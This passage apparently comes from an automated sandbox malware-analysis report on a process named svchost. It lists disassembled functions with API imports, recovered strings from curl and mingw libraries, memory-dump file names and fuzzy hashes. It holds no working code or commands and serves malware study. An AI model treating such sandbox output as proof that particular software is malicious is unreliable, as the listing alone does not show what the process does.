                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: attempt to borrow xfer_ulbuf when already borrowed$could not allocate xfer_ulbuf of %zu bytes$transfer has no multi handle$transfer upload buffer size is 0
                          • API String ID: 0-290960075
                          • Opcode ID: 8739eec3fdf5686d42da1d708e43649691837330acd978fcdfac19125c951631
                          • Instruction ID: a03d918efa4f5239838206ab37c587a7f14798b0e469cd2437d2bd1cf48307b7
                          • Opcode Fuzzy Hash: 8739eec3fdf5686d42da1d708e43649691837330acd978fcdfac19125c951631
                          • Instruction Fuzzy Hash: 08413D3AB0ABC6C1EB51DF95E4A43B833A0EB85F84F588432DE4D57396CE39D4958314
                          Function 64945340 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CloseHandleValue$_endthreadex
                          • String ID:
                          • API String ID: 3955988603-0
                          • Opcode ID: b7945b1e01c22a34e39ac6e8360c113142cd86d22e17861272ae90291c3e3858
                          • Instruction ID: 91f102dbb4e4c7d839af2ef950484d69c9086b08797906d5a721fd90f77057ec
                          • Opcode Fuzzy Hash: b7945b1e01c22a34e39ac6e8360c113142cd86d22e17861272ae90291c3e3858
                          • Instruction Fuzzy Hash: C0217932285B40C2EB1ADF61E45436D3BB6EB85F68F594029CF0A0B394DFB9C849C750
                          Function 64947A00 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 295memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualQuery.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BB0
                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BD2
                          Strings
                          • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC, 64947CD6
                          • Unknown pseudo relocation protocol version %d., xrefs: 64947CED
                          • Unknown pseudo relocation bit size %d., xrefs: 64947C8C
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Virtual$ProtectQuery
                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                          • API String ID: 1027372294-974437099
                          • Opcode ID: e0f154f0bd97eae7fb13bd6116e2de9bfce756cd8e3c01188d1299480cc220fd
                          • Instruction ID: dbc6561fcfc5939c46aa7cdc6d716169bef66825e7e028ef0cbcfa92e83a18d9
                          • Opcode Fuzzy Hash: e0f154f0bd97eae7fb13bd6116e2de9bfce756cd8e3c01188d1299480cc220fd
                          • Instruction Fuzzy Hash: 3FA165797916084AFB00EB31E89031A7363F745BE8F048A61CE1C4B7A8DB3DC586C350
                          Function 00007FFDA557E470 Relevance: 8.8, APIs: 7, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 97e6894c87ec5926fb62101717520f73b06dfd11fea57b84039e26209f540738
                          • Instruction ID: 8c7dbdfc0408cdcb265466f0012d83eae31c8e231b53082a9501fefd597b081a
                          • Opcode Fuzzy Hash: 97e6894c87ec5926fb62101717520f73b06dfd11fea57b84039e26209f540738
                          • Instruction Fuzzy Hash: 6E11007EB1AB4582DB129F26E8542396374FB89F95F181031EE4E03B59CF3CD4858714
                          Function 64943360 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 649433B6
                          • (, xrefs: 649433AE
                          • (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 649433C1
                          • Assertion failed: (%s), file %s, line %d, xrefs: 649433C8
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: __iob_func
                          • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                          • API String ID: 686374508-3651547468
                          • Opcode ID: 7bff3dde8ce2c9ddfee02efadf41117ec0380b55c006dc73d75c7ed4cc5f8649
                          • Instruction ID: 49758d916bec52361b93001baeb39d1493085cd40ca709cf8d0fcfd1233c8ec3
                          • Opcode Fuzzy Hash: 7bff3dde8ce2c9ddfee02efadf41117ec0380b55c006dc73d75c7ed4cc5f8649
                          • Instruction Fuzzy Hash: AA01493679150996EB14EF39E89478E3BA1F795B58FC98022C90C47320DF39C99BC7A0
                          Function 00007FFDA5590530 Relevance: 7.7, APIs: 6, Instructions: 222stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: memmovestrchr$callocfree
                          • String ID:
                          • API String ID: 715457610-0
                          • Opcode ID: 8fb391e395c99c9712a29529522406e9002af3bea64d3d088657d6242ad11739
                          • Instruction ID: 37a52373adaa2561528173eccb05e6a1843412699553b7922ae4d7cb8c0211f7
                          • Opcode Fuzzy Hash: 8fb391e395c99c9712a29529522406e9002af3bea64d3d088657d6242ad11739
                          • Instruction Fuzzy Hash: 7181E96AB0A6DEC5EB624F9595243B967E5AF47F90F480531DA8C027E3DF2CD4428708
                          Function 00007FFDA55967D0 Relevance: 7.6, APIs: 6, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559681C
                          • memmove.VCRUNTIME140(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559683A
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559689B
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55968A5
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55968AF
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55968CA
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$callocmemmove
                          • String ID:
                          • API String ID: 2309541529-0
                          • Opcode ID: 5a28a946c427f8c4b9c54dd4f2aa893310d1956935542d2192d50d91f028810d
                          • Instruction ID: 3936bbcc0bbe3bcce70f5e008a578cfdff27b391025a7a56b10560880ef763b0
                          • Opcode Fuzzy Hash: 5a28a946c427f8c4b9c54dd4f2aa893310d1956935542d2192d50d91f028810d
                          • Instruction Fuzzy Hash: D3314F6AB0AA0581EB52DF15E86436963B0FF86F84F540035EE5D07B56DF3CE845C344
                          Function 00007FFDA558D4FF Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: OS/400$SITE NAMEFMT 1
                          • API String ID: 1294909896-2049154998
                          • Opcode ID: b103e050b99080ea7252de3348955a1dcc85e73f80beeb0ad254a0c927e6aad0
                          • Instruction ID: 606359225da7a1ffc88ca6f21817e9eff132eafbbbf72ee1569e92858378093b
                          • Opcode Fuzzy Hash: b103e050b99080ea7252de3348955a1dcc85e73f80beeb0ad254a0c927e6aad0
                          • Instruction Fuzzy Hash: E631A25AB0E7CA81EB279F2594743B927E09F43F84F844072DA4E07783EE2CE4449A14
                          Function 649464A0 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: _errno$CreateSemaphore
                          • String ID:
                          • API String ID: 4016566793-0
                          • Opcode ID: 589d0227ed7358cdbab2bd92d4174e6ec32cd5d37d7a8e4e3cf95ff430ec2371
                          • Instruction ID: b79095f19616a0e1c0eed2ee7e78f77239b15f2aeb5a75ddd7e641c4488f5580
                          • Opcode Fuzzy Hash: 589d0227ed7358cdbab2bd92d4174e6ec32cd5d37d7a8e4e3cf95ff430ec2371
                          • Instruction Fuzzy Hash: 9011B1B2BC56008AF7195F39D9003492AA6AB9ABB4F189324CE29433C4DF3CCC51CB60
                          Function 00007FFDA55B3800 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B3829
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B383C
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B3850
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B38C7
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B38D3
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdupmalloc
                          • String ID:
                          • API String ID: 111713529-0
                          • Opcode ID: d1ba6d1d21f2e3dad0caf2e82429f9c168c85e3aab7faece0acb10ed47e5996e
                          • Instruction ID: 7c42cd3166b286a31b5f79efe16cc1dc1c7beae132fd132e09c8cb5482ccc0d7
                          • Opcode Fuzzy Hash: d1ba6d1d21f2e3dad0caf2e82429f9c168c85e3aab7faece0acb10ed47e5996e
                          • Instruction Fuzzy Hash: EE213D29F0BB4A81EE569F06E528338A6A4EF49FC0B0A4435EE4D17B55EF3DE4518314
                          Function 64947570 Relevance: 7.6, APIs: 5, Instructions: 57timethreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 649475B5
                          • GetCurrentProcessId.KERNEL32 ref: 649475C0
                          • GetCurrentThreadId.KERNEL32 ref: 649475C8
                          • GetTickCount.KERNEL32 ref: 649475D0
                          • QueryPerformanceCounter.KERNEL32 ref: 649475DD
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                          • String ID:
                          • API String ID: 1445889803-0
                          • Opcode ID: ea8bfe2061e22a54fb9383ec99bc53ec21c7b77bb38b29a6e5ad63f23be09ef5
                          • Instruction ID: 0c0c2922cb4178c1b0210dc40f9cacb2f98c604e546ea9db0ef1c374853c2b83
                          • Opcode Fuzzy Hash: ea8bfe2061e22a54fb9383ec99bc53ec21c7b77bb38b29a6e5ad63f23be09ef5
                          • Instruction Fuzzy Hash: 6D11A322791B5486F711AB29FD0835663A2B789BE4F181274DE6D47BA4EB3CC896C310
                          Function 649465A0 Relevance: 7.6, APIs: 5, Instructions: 54sleepCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32 ref: 649465CE
                          • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 64946602
                          • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 649465F7
                            • Part of subcall function 64943070: CloseHandle.KERNEL32 ref: 6494308F
                          • _errno.MSVCRT ref: 6494662C
                          • _errno.MSVCRT ref: 6494663F
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CloseHandleSleep_errno
                          • String ID:
                          • API String ID: 3806203616-0
                          • Opcode ID: 6a839e314fafbd7497d028076ab11196cdc404032560b441b8063b65648a7ce0
                          • Instruction ID: 03ddaebe43857b623ab1e550e4093299913edf0f9749a6867346f71a96c3e09c
                          • Opcode Fuzzy Hash: 6a839e314fafbd7497d028076ab11196cdc404032560b441b8063b65648a7ce0
                          • Instruction Fuzzy Hash: 1C018CB53C060482FB99AF36ED1036D2765AB56BE8F5812358E2A83790DF3DC891C710
                          Function 64941A20 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 64941A36
                          • LeaveCriticalSection.KERNEL32 ref: 64941A53
                          • LeaveCriticalSection.KERNEL32 ref: 64941A7A
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          • Opcode ID: 57d73889eeb91523de87f080284301cfa8d29add8d7bd3e5f7b6e4a3d255b1d7
                          • Instruction ID: 2dd914d0eaea0fc0e1107ad45c6fa9da700d638ea0117e3c271b5cb5a1496ee8
                          • Opcode Fuzzy Hash: 57d73889eeb91523de87f080284301cfa8d29add8d7bd3e5f7b6e4a3d255b1d7
                          • Instruction Fuzzy Hash: 8E01F72279520983EB194F67FD55319B6959B97BE6F18C2308E0E46390ED3CC4A68300
                          Function 00007FFDA557E530 Relevance: 7.5, APIs: 6, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 72c37c0da18354029ccf449bb2fbeb96b4f3bf4197331d8e1f86f4f6a8450b39
                          • Instruction ID: 8606c48f1902bdce3e6da9a820231a5313994c80e3d26e6c2e9ce07148e70555
                          • Opcode Fuzzy Hash: 72c37c0da18354029ccf449bb2fbeb96b4f3bf4197331d8e1f86f4f6a8450b39
                          • Instruction Fuzzy Hash: 3F11077AA0AB4582D7229F22E854229B3B4FB89F94F180531EE8D03B69CF7CD4958714
                          Function 64946E10 Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentErrorHandleLastOpen_errno
                          • String ID:
                          • API String ID: 202612177-0
                          • Opcode ID: 587258b105657c6678b600fc4fc5aeb211ef1c91ff3197a6972a381e73b22a44
                          • Instruction ID: d49a8a23e1058b1192e3c43f6f29e1dfd3ea68b05546fdb3f02e8313691cc950
                          • Opcode Fuzzy Hash: 587258b105657c6678b600fc4fc5aeb211ef1c91ff3197a6972a381e73b22a44
                          • Instruction Fuzzy Hash: B1F0A76038550187EF0D5F72D8483AF61E79B0EB55F145539CD1A86390EF3DC975C620
                          Function 00007FFDA55A96C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: memchr$ErrorLast
                          • String ID: response reading failed (errno: %d)
                          • API String ID: 1529586282-1140215186
                          • Opcode ID: 9c86d5756c3c46e04771a8445c278a0c19422653bd5d77946d67baac05f14e25
                          • Instruction ID: 17d9e47f3c713fdc8d1648bf842d32ead7b6099efa9633185d078f4bca3ef420
                          • Opcode Fuzzy Hash: 9c86d5756c3c46e04771a8445c278a0c19422653bd5d77946d67baac05f14e25
                          • Instruction Fuzzy Hash: 0651646670A78A86EA529F61A4643AA63A4FF46F84F844435DF8D47783DF3CE505C304
                          Function 00007FFDA55D2759 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
